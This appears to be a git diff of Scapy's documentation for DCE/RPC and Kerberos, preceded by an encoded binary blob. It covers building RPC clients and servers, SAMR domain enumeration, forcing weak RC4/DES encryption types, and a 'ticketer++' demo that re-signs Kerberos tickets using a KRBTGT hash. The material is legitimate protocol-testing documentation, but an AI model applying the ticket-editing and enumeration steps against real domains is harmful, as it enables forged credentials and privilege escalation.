zdu|V!pgm)1le2d>fGXB%L)>lHM$_O{{=pq01U$f2v-<8%;=CB&s52Pju3vc%FAHpl zAXY{QrE1|8s$G|Yy1chK>iZS3xPAJMz{ zOWkalWVAOtQrCRHL%ln$_Weo9K?4v!JqI}7H}4=E&L1=U+khGR*k1V`8|dXyGZ_IX zC3J}Ry20_$uHs=_?MLgIrw{LB`pW_n%R3ebUrryPq2nf}M!_r>AH*phV)~;I=x4vQ zI-bu${3mBvl4=h&+PLcuE}oFT8a+hK5k<+o*d0&P$^wO*`1xAo$sFP{JmNgxpk@p) z!5c05CN%v_NCJ*jaZ1bLl#`Xsj$w0F8#Xbq`OZye%7hS=O%)}YIo;? z!cxbhyj1rUl|4=xp#jnekDi#>K*6JCs-0mQ{o@1s^Gu8QqWV(1;h&ZqX9V!zfG9)g z@Sbbgk}79DyH~HQS2q8(-JF_h{!?guSi6Pm^UJ7%WAbE{yb^>oAn~TB?{hDzp9(}8 zg6&%H1{ANko<09ks^M#&3I{~QkvTDMu+FHC-gri=y;HtoJ4)~!0mc;FEtcgO74IG=C?d+i}GmgjC>x?S76?Wdw*WMnL zK{#7b2`z0B(3(2=o+|CIaH+k;84>km?Gk%RkJ?474tn);RR z%gQA(y%gN8qVX#P-JUNhl@#D<6+HZryIy%k!~~Tk^Bo_KiRIVU)E-rg+Swi%8__=t z)BXjj`X!0_dzfdLZ(bciQ#8zwXEOVM;U zw){Mh@iI10$H!xu2|dXM#+!oEz3_uH^>??zE&av%-lG7^Vwf~T z4SnTjxs&T0=&PCFz_9c{K`|rU8Ip39L~yKp{YQu(g^cT0l{4w2kLXY)Tpe0TB|d*w zNxhwStMvK1%`$rx)<*wUH8`K4h}Sl>3vabC-Od<{HI}r2!J|g2ZmZp7`=7_1>jlj1 z@F^XuDOAMS-TtR9KN-`=^`7VBkiXfbocnXtzg<6KF;vrvHvNdZ&FcMKx1s*- z+LY6YOoB32p?Au#$79Ft$EzQw-iNZ?P4O`+&S}pPI7ht1UYLcUFD%g4tFL`Mxt9|p z8wy2$J+5%4l94wq9&T!rV(!6??blZ>v?ajx&<)u=E| z22HVxOD2PzMd%C{n8yRb2kGJwvN?%rg4wsUch|nZr55u~9&|PykEe^-)*iAqRT8q> zZTZXewtcy{!qC2T20t&hOn1ypxaVvx`7@^Ta*x@CGo~q8N*McJYoEh>%{EYN&J47c zwudqze;+cItL(`^X_D6r&0G3D%xhi z&l&k__vt4|3m;Qw@I5}v_3uzTSchp~5cc$t+dOr-uEF$TS(Cp%3a>U;o%j0?aE(Ng z=6eU9NaxZ$0^ff8f>XMFEf_d9aq5nr7oPOuE3X~O9+0&o7Q^P1v{3wGgf_u<#Cjd@+6^QUE-nD zc9nj(Ar$H5$WAacsUf@QE#~amQYt~|R2N1?DxDpycQgKQhj^J1W{oOUp`G4J>M`u^ z|L!jYqJZBsh+dsPNtii9zt}`krxChM%w}Y%e9)F}Ai9{tM4i;4#uAEa@^3gPi>fg!ag%p{ zI0i4Cl|23cjPQJ zn|6|oE&jdTfA!pCUanqKKW{TyR@JjvKL3gf5vAM{Th$s=A4T5&xZ` zA$;Hd&X95a4;&vH_~*^Ko<1U0gyIcz7!+iWbR(*nU5S`?6jtI#E~yM>l`2`1J#*() zuhXU@rucm62^*>dO)5_5MaB%&ZeFtDK;qQ_qj_|Lsefgq?4CU8GUI)J!<+*gAUHMx-v9&@QTfXMyq z_%U=h2j9|F?_yn$1i>&yVHleIPeG$RqB$uLII;79#lzRgQc3aThP5zA)=32qDW2=i z*c}*eF)$>W^!~q6K;9&eKE?-+;B?$2V(#211i>P;$Wxc&IgkQ*6XXHX9o3Y_#k}M_ z6yb-lHMs5$#4sJ}z*kxg^O>RBj*vzKKFHFu<339;$mzt9RwKY5Chk-q`ReuncydP{ zmme+IDwYr_%p#8(e8v(WVFDj$mi`73@D1SQ3^05s5)M~6$@&BdZ3mm{T!`mN#sspK zVk!1G7rBO0U^KJZKa7FB1^4XYfXzL!V0-Ovlin;)dnb4x3F9NUem{^=OaroQ+t)?@ zD{qsxxtp06Mwdq|FuR#pfI$qt*PZTIx&160X#OqUjZn>mt4lPtybCuS7dY0d8wHx6 zhu@w-c^YI+BuvP<&o4w!h?DcYK|QjJ$rFsoblNn`fk#6UM2UgVL;%VzsX6xO@!lyn zC7W!YRR;b~G}2nvF+3;PWcGC+e=mR>vDUD-e4>#1;-GGOMKnK$cYJDB{mE^L)BM;6 zk0Oj*iQZMS+@K0fb7@HDX_tSMa>pSlR!jKq0;5*i+iU}VT9Pn&O1)MgV`;xr8O>+0 zV?;6vB+8RupkFd<9F0cx($@v07+0hOw3k*%pOl6hz0%CClK}NtA zq|}-lsljjk+`#kWrK}>1lDfyg=!mI;>JT*Xg6FKkf==MvV*J$s9G9wX09j5l7w<@3 zAwxmSEti|AS?75fr##Vr*?12dD-RTKBI6HlH^>`-VdQYAO`5Wkio20f7a!`zMefTY&8khda6 z9BsDw$KVN^=}iEPp)zDUAWOaifeNyJ6LZ*cDzOPMdC}kvp)v(|Q?UvS|F(AoLzuk8 z@Stl+&G{_>y$~ZKNX!u8j&!vZNmP>|CW8_C06{u%&=@%K^?pj%FYqQ@5hM&f-`^WW zz=EY-6ZE==Bx)CIPL*bd=3CMZ3}i~!A&ITwi2nozui2b&AoEsbOogfhuQT%_uqLlO zZ(CYI3FlQNC8YyHmdTEtEMMr%P^hOt{1;Ftp9LhhOb4g;t^oAL2yo35S7DgzMNUXF zl#k~&^Q&HYI>D{hM^|G)Ti?*)HK+aqxx@BGH=$ zAMJ?$X^5p<3gYnfM-t>5#o8fQQr%C_fFZnM+m?f*kZS-X<0?6EtLGlOlSo~E<1W(H z`36Q@6(<NZU^{Ux+9&a-|+5p3^QbiqpJEq2;Js7%Fs<`iGk&ln)AoUK4lKTjn z8T{M->d!usuGi<^Gt1_{*?Jts|B_)^ZXNZbm*N-^C9UX zgW_GnUGe|@m-lxm9T%Lo?bq$sBbm`^Xtf-04OStip%O@&48oe}W!*-mY{NE|1T7E0 zZAGLznaNOsD$DyL0bTyJcJ15tQm#M34o3&ZmHFZ0qMkVMvqSF*{d~M~RMp0t|H7(4 zTh?r$w>*`;Z2uJ>Z(rQ3 zm$JX1mIJ<@pJB+UE$=yY7F3Nnp^3yUF=yX@<@e;j|K6SvEzcoK?8&j2$5Gaqbld)P zFLG#9SwTQkpb83QGg~@iY&n#`A!S7;cEc_=stz|hzgNX^RIYPcxAxT_V}^72E>6$; z1C3$-dJZKc^hFPk#`bm`yh(_f3Aa2aW++53pB9TtnQ zc^`kFsIYiwHO)IeG372Myj#xf=w2WE>PXcnMG4D3i)CToNv;gxsJQ5a;j%y*z+>c-nqzwMM^(MN9cv47CDn?X@Ew!>|M zS6Q;#O!?B}GiCc%S2~F)4dWG-jd*8CWCJz$>~tDwOxHiS22qiP(-+-~TE9>S?O#H$ zQGy!>M)6?4PH&dsxt#LwC%&{&`6|)Up26j7vdLcN(u9<8Uxr_s>2$u2WECvEZx0w%D{^a?}mPx5CI!){GRMhVuhPy`GG1LAvs63T^>IGjJ=h?`GojitTb=^ zDXm&K4eLF$z}~(&tBhcHx)kK8m1`6V9XCF)ZEouy@>18}pg=})AL6~vyUx&g z=R_WSYG!B?zgZ*ZuC>~4B5!_4+{@ZBjak(AFlbwsLqWhJ*i1O;__nQ3$28j|1u8EN zS-zbb5xW^NQ>~r#?Cwf=$Bl*Q-qugA;PXa}5Ya&W{jJl6i*I-9l*+H#d4|TN$Y)Nt zwUX#j=IkbEzU!RbhDDm!N-V#LV zpvb5*&^YQNDU6+t?=wk>V%6K19GRBy>Pqs*lecGXHP62Cr@yktY6`pa0u@lG>-wuQJrtns#Mp^3RTVc(*Amu5%}Rx#HaJs#EQzojuiGO79(GP|eGU$4chF zUs0K{HSYQ#f@dzb;3;v#dTgy6L zB%o$iXKpvo8d>o?zs`HvjWyBJxae)JY-gwb86!;;>a>mQ!~1HqQ_(N?I;M{@S=G6s z)4xew;pnE4y>_XphJrWzKPQyQ3RwyWWoC|R6~`JR6&&A)95s%y^cX!Z^!n?zwf*TM z>&|Z6CY_hb?AGS(NFDDItHPA=LG4Hpae=*cv&e?JJA?O@$MT&+LRp_vt`#F)1hWj! zFcKLywu1BPwpW~OYK~^8I^z$9&#|IgD)#r_s>S$k@>62_TVjoD-uvqD%wH@ z8$JF-AqB-PhMLsu`TXOC1r(93?mtWQY=gI|Z)pksx?{WYxiz_6aps$#@bx%zBKY%| zLtl7`ihily)$7VZ_apH<$EMv-E9f|7G+!sOPbBob1AHeyS7}& z=u|Ea-!G>=I9%l3_FG+Y%~bs6^)=68>g^e=y25`|>f&NI8~3Ho_Jc`Uo6MXMJ{}Ao z6?j|&`0t-Jpc!f6iC6K+;cA`cEm;xXJZqzT)+#4{&9LkDyVmbSqL*vz%#){XH93Z= z(jg`MOaoISZ7Ugp_W_oSAmc{=+$rV!uCeIn_S^YU=^f*V*G(FXQq zr1(F%uAo|jgqk^yLsNsLY;nsd8h-b}a%H|8 z=67H)w-JFaIw#|c&vL6Ko{Hgb4sof|vTrXP?JPGCMNm}t1kZgNHcZ}EYa>rudCAK) zFdbIHobCKzdT5MDWioc1?owUUz2k-X`8{=Tj+jvisJ3kM28x8S6EW>7)3}B-rt#Q~ zKHA-z)*;NIXcK9N-Ny7b_8doUA@`o?*n)(SZrO;GtHKk#v(j?%!^}N;L(&^5BL{S= zt!hYn^9e+X^cK#tzsr_^v$*wWCpacXJ3;!pY1&0p02*0o1K9hg?sy<)Ulj4xav{ zj?8FTqV~I9oKYNeNwGtVnVl1Jev`qnsLwXgNs!{Gds>j4wU|`4i?5+7OPo(zYrXv~ zm%0a2$=%J}hCEVbP;3r9+*|W0KAx3&g!WpO`kSTqC|px=EC}*~7)~;OIwBqMT_n-B zR!6bV!zV4eX)jj6YS4URxIUt1<&(*A-l$C1&rk0qpV3DTby$t&EnA#aY>f}xB?MpW z4Q-VCGdEp+Lo(Z^`yuUg^#nD)#LbE|d2GbFh&vNRd__8ZksUhO3CxrQw<}5pre`E0 zdUBp&B=gK`_ with the `[MS-RPCE] `_ additions + +Scapy provides support for dissecting and building Microsoft's Windows DCE/RPC calls. + +Usage documentation +------------------- + +Terminology +~~~~~~~~~~~ + +- ``NDR`` (and ``NDR64``) are the transfer syntax used by DCE/RPC, i.e. how objects are marshalled and sent over the network +- ``IDL`` or Interface Definition Language is "a language for specifying operations (procedures or functions), parameters to these operations, and data types" in context of DCE/RPC + +NDR64 and endianness +~~~~~~~~~~~~~~~~~~~~ + +All packets built with NDR extend the ``NDRPacket`` class, which adds the arguments ``ndr64`` and ``ndrendian``. + +You can therefore specify while dissecting or building packets whether it uses NDR64 or not (**by default: no**), or its endian (**by default: little**) + +.. code:: python + + NetrServerReqChallenge_Request(b"\x00....", ndr64=True, ndrendian="big") + +Dissecting +~~~~~~~~~~ + +You can dissect a DCE/RPC packet like any other packet, by calling ``ThePacketClass()``. The only difference is, as mentioned above, that there are extra ``ndr64`` and ``ndrendian`` arguments. + +.. note:: + DCE/RPC is stateful, and requires the dissector to remember which interface is bound, how (negotiation), etc. + Scapy therefore provides a ``DceRpcSession`` session that remembers the context to properly dissect requests and responses. + +Here's an example where a pcap (included in the ``test/pcaps`` folder) containing a [MS-NRPC] exchange is dissected using Scapy: + +.. code:: python + + >>> load_layer("msrpce") + >>> bind_layers(TCP, DceRpc, sport=40564) # the DCE/RPC port + >>> bind_layers(TCP, DceRpc, dport=40564) + >>> pkts = sniff(offline='dcerpc_msnrpc.pcapng.gz', session=DceRpcSession) + >>> pkts[6][DceRpc5].show() + ###[ DCE/RPC v5 ]### + rpc_vers = 5 (connection-oriented) + rpc_vers_minor= 0 + ptype = request + pfc_flags = PFC_FIRST_FRAG+PFC_LAST_FRAG + endian = little + encoding = ASCII + float = IEEE + reserved1 = 0 + reserved2 = 0 + frag_len = 58 + auth_len = 0 + call_id = 1 + ###[ DCE/RPC v5 - Request ]### + alloc_hint= 0 + cont_id = 0 + opnum = 4 + ###[ NetrServerReqChallenge_Request ]### + PrimaryName= None + \ComputerName\ + |###[ NDRConformantArray ]### + | max_count = 5 + | \value \ + | |###[ NDRVaryingArray ]### + | | offset = 0 + | | actual_count= 5 + | | value = b'WIN1' + \ClientChallenge\ + |###[ PNETLOGON_CREDENTIAL ]### + | data = b'12345678' + + +Scapy has opted to not abstract any of the NDR fields (see `Design choices`_), allowing to keep access to all lengths, offsets, counts, etc... This allows to put wrong length values anywhere to test implementations. + +The catch is that accessing the value of a field is a bit tedious:: + + >>> pkts[6][DceRpc5].ComputerName.value[0].value + b'WIN1' + +Sometimes, you'll be glad to have access to the size of a ConformantArray. Most times, you won't. +All ``NDRPacket`` therefore include a ``valueof()`` function that goes through any array or pointer containers:: + + >>> pkts[6][NetrServerReqChallenge_Request].valueof("ComputerName") + b'WIN1' + +.. warning:: + + Note that ``DceRpc5`` packets are NOT ``NDRPacket``, so you need to call ``valueof()`` on the NDR payload itself. + +Building +~~~~~~~~ + +If you were to re-build the previous packet exactly as it was dissected, it would look something like this: + +.. code:: python + + >>> pkt = NetrServerReqChallenge_Request( + ... ComputerName=NDRConformantArray(max_count=5, value=[ + ... NDRVaryingArray(offset=0, actual_count=5, value=b'WIN1') + ... ]), + ... ClientChallenge=PNETLOGON_CREDENTIAL(data=b'12345678'), + ... PrimaryName=None + ... ) + +If you don't care about specifying ``max_count``, ``offset`` or ``actual_count`` manually, you can however also do the following: + +.. code:: python + + >>> pkt = NetrServerReqChallenge_Request( + ... ComputerName=b'WIN1', + ... ClientChallenge=PNETLOGON_CREDENTIAL(data=b'12345678'), + ... PrimaryName=None + ... ) + >>> pkt.show() + ###[ NetrServerReqChallenge_Request ]### + PrimaryName= None + \ComputerName\ + |###[ NDRConformantArray ]### + | max_count = None + | \value \ + | |###[ NDRVaryingArray ]### + | | offset = 0 + | | actual_count= None + | | value = 'WIN1' + \ClientChallenge\ + |###[ PNETLOGON_CREDENTIAL ]### + | data = '12345678' + + +And Scapy will automatically add the ``NDRConformantArray``, ``NDRVaryingArray``... in the middle. + +This applies to ``NDRPointers`` too ! Skipping it will add a default one with a referent id of ``0x20000``. Take ``RPC_UNICODE_STRING`` for instance: + +.. code:: python + + >>> RPC_UNICODE_STRING(Buffer=b"WIN").show2() + ###[ RPC_UNICODE_STRING ]### + Length = 6 + MaximumLength= 6 + \Buffer \ + |###[ NDRPointer ]### + | referent_id= 0x20000 + | \value \ + | |###[ NDRConformantArray ]### + | | max_count = 3 + | | \value \ + | | |###[ NDRVaryingArray ]### + | | | offset = 0 + | | | actual_count= 3 + | | | value = 'WIN' + + +Client +------ + +Scapy also includes a DCE/RPC client: :class:`~scapy.layers.msrpce.rpcclient.DCERPC_Client`. + +It provides a bunch of basic DCE/RPC features: + +- :func:`~scapy.layers.msrpce.rpcclient.DCERPC_Client.connect`: connect to a host +- :func:`~scapy.layers.msrpce.rpcclient.DCERPC_Client.bind`: bind to a DCE/RPC interface +- :func:`~scapy.layers.msrpce.rpcclient.DCERPC_Client.connect_and_bind`: connect to a host, use the endpoint mapper to find the interface then reconnect to the host on the matching address +- :func:`~scapy.layers.msrpce.rpcclient.DCERPC_Client.sr1_req`: send/receive a DCE/RPC request + +To be able to use an interface, it must have been imported. This makes it so that the :func:`~scapy.layers.dcerpc.register_dcerpc_interface` function is called, allowing the :class:`~scapy.layers.dcerpc.DceRpcSession` session to properly understand the bind/alter requests, and match the DCE/RPCs by opcodes. + +In the DCE/RPC world, there are several "Transports". A transport corresponds to the various ways of transporting DCE/RPC. You can have a look at the documentation over `[MS-RPCE] 2.1 `_. In Scapy, this is implemented in the :class:`~scapy.layers.dcerpc.DCERPC_Transport` enum, that currently contains: + +- :const:`~scapy.layers.dcerpc.DCERPC_Transport.NCACN_IP_TCP`: the interface is reached over IP/TCP, on a port that varies. This port can typically be queried using the endpoint mapper, a DCE/RPC service that is always on port 135. +- :const:`~scapy.layers.dcerpc.DCERPC_Transport.NCACN_NP`: the interface is reached over a named pipe over SMB. This named pipe is typically well-known, or can also be queried using the endpoint mapper (over SMB) on certain cases. + +Here's an example sending a ``ServerAlive`` over the ``IObjectExporter`` interface from `[MS-DCOM] `_. + +.. code-block:: python + + from scapy.layers.dcerpc import * + from scapy.layers.msrpce.all import * + + client = DCERPC_Client( + DCERPC_Transport.NCACN_IP_TCP, + ndr64=False, + ) + client.connect("192.168.0.100") + client.bind(find_dcerpc_interface("IObjectExporter")) + + req = ServerAlive_Request(ndr64=False) + resp = client.sr1_req(req) + resp.show() + +Here's a different example, this time connecting over ``NCACN_NP`` to `[MS-SAMR] `_ to enumerate the domains a server is in: + +.. code-block:: python + + from scapy.layers.ntlm import NTLMSSP, MD4le + from scapy.layers.dcerpc import * + from scapy.layers.msrpce.all import * + + client = DCERPC_Client( + DCERPC_Transport.NCACN_NP, + ssp=NTLMSSP( + UPN="User", + HASHNT=MD4le("Password"), + ), + ndr64=False, + ) + client.connect("192.168.0.100") + client.open_smbpipe("lsass") # open the \pipe\lsass pipe + client.bind(find_dcerpc_interface("samr")) + + # Get Server Handle: call [0] SamrConnect + serverHandle = client.sr1_req(SamrConnect_Request( + DesiredAccess=( + 0x00000010 # SAM_SERVER_ENUMERATE_DOMAINS + ) + )).ServerHandle + + # Enumerate domains: call [6] SamrEnumerateDomainsInSamServer + EnumerationContext = 0 + while True: + resp = client.sr1_req( + SamrEnumerateDomainsInSamServer_Request( + ServerHandle=serverHandle, + EnumerationContext=EnumerationContext, + ) + ) + # note: there are a lot of sub-structures + print(resp.valueof("Buffer").valueof("Buffer")[0].valueof("Name").valueof("Buffer").decode()) + EnumerationContext = resp.EnumerationContext # continue enumeration + if resp.status == 0: # no domain left to enumerate + break + + client.close() + +.. note:: As you can see, we used the :class:`~scapy.layers.ntlm.NTLMSSP` security provider in the above connection. + +There's an extension of the ``DCERPC_Client``: the ``NetlogonClient`` which is unfinished because I can't seem to make ``NetrLogonGetCapabilities`` work, but worth mentioning because it implements its own ``NetlogonSSP``: + +.. code-block:: python + + from scapy.layers.msrpce.msnrpc import * + from scapy.layers.msrpce.raw.ms_nrpc import * + + client = NetlogonClient( + auth_level=DCE_C_AUTHN_LEVEL.PKT_PRIVACY, + computername="SERVER", + domainname="DOMAIN", + ) + client.connect_and_bind("192.168.0.100") + client.negotiate_sessionkey(bytes.fromhex("77777777777777777777777777777777")) + client.close() + +Server +------ + +It is also possible to create your own DCE/RPC server. This takes the form of creating a :class:`~scapy.layers.msrpce.rpcserver.DCERPC_Server` class, then serving it over a transport. + +This class contains a :func:`~scapy.layers.msrpce.rpcserver.DCERPC_Server.answer` function that is used to register a handler for a Request, such as for instance: + +.. code-block:: python + + from scapy.layers.dcerpc import * + from scapy.layers.msrpce.all import * + + class MyRPCServer(DCERPC_Server): + @DCERPC_Server.answer(NetrWkstaGetInfo_Request) + def handle_NetrWkstaGetInfo(self, req): + """ + NetrWkstaGetInfo [MS-SRVS] + "returns information about the configuration of a workstation." + """ + return NetrWkstaGetInfo_Response( + WkstaInfo=NDRUnion( + tag=100, + value=LPWKSTA_INFO_100( + wki100_platform_id=500, # NT + wki100_ver_major=5, + ), + ), + ndr64=self.ndr64, + ) + +Let's spawn this server, listening on the ``12345`` port using the :const:`~scapy.layers.dcerpc.DCERPC_Transport.NCACN_IP_TCP` transport. + +.. code-block:: python + + MyRPCServer.spawn( + DCERPC_Transport.NCACN_IP_TCP, + port=12345, + ) + + +Of course that also works over :const:`~scapy.layers.dcerpc.DCERPC_Transport.NCACN_NP`, with for instance a :class:`~scapy.layers.ntlm.NTLMSSP`: + +.. code-block:: python + + from scapy.layers.ntlm import NTLMSSP + ssp = NTLMSSP( + IDENTITIES={ + "User1": NTOWFv2("Password", "User1", "DOMAIN"), + } + ) + + MyRPCServer.spawn( + DCERPC_Transport.NCACN_NP, + ssp=ssp, + iface="eth0", + port=445, + ndr64=True, + ) + + +To start an endpoint mapper (this should be a separate process from your RPC server), you can use the default :class:`~scapy.layers.msrpce.rpcserver.DCERPC_Server` as such: + +.. code-block:: python + + from scapy.layers.dcerpc import * + from scapy.layers.msrpce.all import * + + DCERPC_Server.spawn( + DCERPC_Transport.NCACN_IP_TCP, + iface="eth0", + port=135, + portmap={ + find_dcerpc_interface("wkssvc"): 12345, + }, + ndr64=True, + ) + + +.. note:: Currently, a DCERPC_Server will let a client bind on all interfaces that Scapy has registered (imported). Supposedly though, you know which RPCs are going to be queried. + + +Define custom packets +--------------------- + +TODO: Add documentation on how to define NDR packets. + +.. _Design choices: + +Design choices +-------------- + +NDR is a rather complex encoding. For instance, there are multiple types of arrays: + +- fixed arrays +- conformant arrays +- varying arrays +- conformant varying arrays + +All of which have slightly different representations on the network, but generally speaking it can look like this: + +.. image:: ../graphics/dcerpc/ndr_conformant_varying_array.png + :align: center + +Those lengths are mostly computable, but this raises the question of: **what should Scapy report to the user?**. + +Some implementations (like impacket's), have chosen to abstract the lengths, offsets, etc. and hide it to the user. This has the big advantage that it makes packets much easier to build, but has the inconvenience that it is in fact hiding part of the information contained in the packet, which really is against Scapy's philosophy. + +The same happens when encoding pointers, which looks something like this: + +.. image:: ../graphics/dcerpc/ndr_full_pointer.png + :align: center + +where it is tempting to hide the ``referent_id`` part, which is on Windows in most parts irrelevant. + +**In Scapy, you will find all the fields**. The pros are that it is exhaustive and doesn't hide any information, the cons is that you need to use the utils (``valueof()`` on dissection, implicit ``any2i`` on build) in order for it not to be a massive pain. diff --git a/doc/scapy/layers/kerberos.rst b/doc/scapy/layers/kerberos.rst index 4041fcb515b..aa9ad880138 100644 --- a/doc/scapy/layers/kerberos.rst +++ b/doc/scapy/layers/kerberos.rst @@ -6,16 +6,22 @@ Kerberos High-Level __________ +Kerberos client +~~~~~~~~~~~~~~~ + Scapy includes a (tiny) kerberos client, that has basic functionalities such as: AS-REQ ------ -.. note:: Full doc at :func:`~scapy.layers.kerberos.krb_as_req`. ``krb_as_req`` actually calls a Scapy automaton. +.. note:: Full doc at :func:`~scapy.layers.kerberos.krb_as_req`. ``krb_as_req`` actually calls a Scapy automaton that has the following behavior: + + .. image:: ../graphics/kerberos/kerberos_atmt.png + :align: center .. code:: pycon - >>> res = krb_as_req("user1@DOMAIN.LOCAL", "192.168.122.17", password="Password1") + >>> res = krb_as_req("user1@DOMAIN.LOCAL", password="Password1") This is what it looks like with wireshark: @@ -45,12 +51,292 @@ The result is a named tuple with both the full AP-REP and the decrypted session >>> res.sessionkey.toKey() +Some more examples: + +**Enforce RC4:** + +.. code:: pycon + + >>> from scapy.libs.rfc3961 import EncryptionType + >>> res = krb_as_req("user1@DOMAIN.LOCAL", etypes=[EncryptionType.RC4_HMAC]) + +**Ask for a DES_CBC_MD5 sessionkey:** + +.. code:: pycon + + >>> from scapy.libs.rfc3961 import EncryptionType + >>> res = krb_as_req("user1@DOMAIN.LOCAL", etypes=[EncryptionType.DES_CBC_MD5, EncryptionType.RC4_HMAC]) + +TGS-REQ +------- + +.. note:: Full doc at :func:`~scapy.layers.kerberos.krb_tgs_req`. ``krb_tgs_req`` actually calls a Scapy automaton. + +**Ask for a ST:** + +Let's reuse the TGT and session key we got in the AS-REQ: + +.. code:: pycon + + >>> krb_tgs_req("user1@DOMAIN.LOCAL", "host/DC1", sessionkey=res.sessionkey, ticket=res.asrep.ticket) + +.. note:: + + There is also a :func:`~scapy.layers.kerberos.krb_as_and_tgs` function that does an AS-REQ then a TGS-REQ:: + + >>> krb_as_and_tgs("user1@DOMAIN.LOCAL", "host/DC1", password="Password1") + +Other things you can do: + +**Renew a TGT:** + +.. code:: pycon + + >>> krb_tgs_req("user1@DOMAIN.LOCAL", "krbtgt/DOMAIN.LOCAL", sessionkey=res.sessionkey, ticket=res.asrep.ticket, renew=True) + +**Renew a ST:** + +.. note:: For some mysterious reason, this is rarely implemented in other tools. + +.. code:: pycon + + >>> res2 = krb_tgs_req("user1@DOMAIN.LOCAL", "host/DC1", sessionkey=res.sessionkey, ticket=res.asrep.ticket) + >>> krb_tgs_req("user1@DOMAIN.LOCAL", "host/DC1", sessionkey=res2.sessionkey, ticket=res2.tgsrep.ticket, renew=True) + + +KerberosSSP +~~~~~~~~~~~ + +For Kerberos, the Scapy SSP is implemented in :class:`~scapy.layers.kerberos.KerberosSSP`. +You can typically use it in :class:`~scapy.layers.smbclient.SMB_Client`, :class:`~scapy.layers.smbserver.SMB_Server`, :class:`~scapy.layers.msrpce.rpcclient.DCERPC_Client` or :class:`~scapy.layers.msrpce.rpcserver.DCERPC_Server`. + +.. note:: Remember that you can wrap it in a :class:`~scapy.layers.spnego.SPNEGOSSP` + +Ticketer++ +~~~~~~~~~~ + +Scapy also implements a "ticketer++" module, named as a tribute to impacket's, in order to manipulate Kerberos tickets. +Ticketer++ is easy to use programmatically, and allows you to manipulate the tickets yourself. +Scapy's ticketer++ implements all fields from RFC4120, [MS-KILE] and [MS-PAC], meaning you can edit ANY field in a ticket to your likings. + +It even provides a GUI (not exactly necessary, but quite handy) that edits & rebuilds the Scapy ticket packet. + +Demo +---- + +Here's a small demo of how this is usable with linux kerberos tools: + +.. note:: We first added a realm ``DOMAIN.LOCAL`` with a kdc to ``/etc/krb5.conf`` + +.. code:: bash + + $ kinit Administrator@DOMAIN.LOCAL + Password for Administrator@DOMAIN.LOCAL: + $ klist + Ticket cache: FILE:/tmp/krb5cc_1000 + Default principal: Administrator@DOMAIN.LOCAL + + Valid starting Expires Service principal + 08/31/2023 12:08:15 08/31/2023 22:08:15 krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + renew until 09/01/2023 12:08:12 + + $ scapy + >>> load_module("ticketer") + >>> t = Ticketer() + >>> t.open_file("/tmp/krb5cc_1000") + >>> t.show() + Tickets: + 1. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + Start time End time Renew until Auth time + 31/08/23 12:08:15 31/08/23 22:08:15 01/09/23 12:08:12 31/08/23 12:08:15 + >>> t.edit_ticket(0) # The only thing we did in the UI was to add 1 hour to the expiration time + Enter the NT hash (AES-256) for this ticket (as hex): 6df5a9a90cb076f4d232a123d9c24f46ae11590a5430710bc1881dca337989ce + >>> t.resign_ticket(0) + >>> t.save() + >>> exit() + $ klist + Ticket cache: FILE:/tmp/krb5cc_1000 + Default principal: Administrator@DOMAIN.LOCAL + + Valid starting Expires Service principal + 08/31/2023 12:08:15 08/31/2023 23:08:15 krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + renew until 09/01/2023 12:08:12 + +Features +-------- + +- **Read/Edit/Write CCaches from other apps**: Let's assume you've acquired the KRBTGT of a KDC, plus you've used ``kinit`` to get a ticket. This ticket was saved to a ``.ccache`` file, that we'll know try to open. + +.. note:: + + You can get the demo ccache file using the following + + .. code:: + + cat < krb.ccache + BQQADAABAAj/////AAAAAAAAAAEAAAABAAAADERPTUFJTi5MT0NBTAAAAA1BZG1pbmlzdHJhdG9y + AAAAAQAAAAEAAAAMRE9NQUlOLkxPQ0FMAAAADUFkbWluaXN0cmF0b3IAAAACAAAAAgAAAAxET01B + SU4uTE9DQUwAAAAGa3JidGd0AAAADERPTUFJTi5MT0NBTAASAAAAIItCJqGQhmy+NFrl5miCPt1T + WcsAvUeaZCi8j+sbpVdSYzMy+mMzMvpjM7+aYzSEdwBQ4QAAAAAAAAAAAAAAAARIYYIERDCCBECg + AwIBBaEOGwxET01BSU4uTE9DQUyiITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDERPTUFJTi5MT0NBTKOC + BAQwggQAoAMCARKhAwIBAqKCA/IEggPuZiwq78yj+MeN444a8dY7GN4BHYZNm+wS88EeILC73Ebm + 9cgxGzMbHMJ7Ixk+kPpHunqmpn+6WCah9HVOpQUO6rLgfQej7BApsqEeBYzjHkj03ivOAX6cKRXu + QP+g9xCVlwiChvopD+bKd3RlFixXV6Z8xTqOMgSEakypz/MMgHPR6ec1tesicX+Xd8Lzj7E9IElS + 2xXk8WDiZTX1lvPOZPmo2WARcY0EBWUNf3xyj4fdLQ4iDkYQNH+qikUJm2OjUfWtz8z2adm2ES4x + iBr4aVYSlKIetuKxZLjObGx7AyfsbHHCN4SwbBkDCj+BEZ83fLbwOVtUd7/7xcGiJk7Er3b0s5pO + L3Aw1IyOu8ryEgNuoKWr3V2pH83D+5cA1TefA/vJ/jpHB42uMLBaQY9G7p6iX1IOt+Z7U9lvf0hu + WHiyLqj0IVE3p9z39Lb1BGNxXZ08VE8pRCDtD3QmlV+gpSfvzoYmT3wpvfws7iw+sifrS3ZR64AI + 4OsmlEakVIgpawQn+CuVmtBwFGzYqa7Z7yNoFb0hSfP4bXMidYTylNyGz0p35O6r+Y9PNC2/xL60 + bYNLDDED2MWWTK1IUu7TZcqOUJN+IZdhItXN4Yxatt1VKMOmgMCiGXEXZt1bajwQOuZa1fVzoxVD + oOvO/eF0kGKVEDD2OQfN4JIBDCLJB2MkjJ9s0DpvCny5p7dEG8feTEDB10k3Ov7ll6Usnb51M9e6 + JKOibfKUdLk2Q+7Zf2uP/ROXaGmESEG902TyRU1uPOGuZ37AHFksJbUOEgMDJA3arILfqdY7HELC + ObeKbE67orZFi5JJMcUrIjucnP1s8PCD5iOeMHR/EwLei96U/odWteARj17WHczDhi3byT8QPDFg + rBWFjL4zBCDW4H4snyQsLK+PBNg/PNcfQEwdVoFMniqnh3Y6vClTNCmUh/RU5LTrXw58PPXjdzdK + z4J8n+JV4cfNsTEp7wfHMRZO5O7VA/c1gpqLfMLjcY2yPYWDj796Q4YaHI+JDkwzQ3tldJlGtG9s + /xdnFY9WhLA18uoIb3tWT2pXBQcUtMrVFltyvm96aCCy6fiTZQYUfmSnei+c+cE/5P1ZuDGRiYEB + 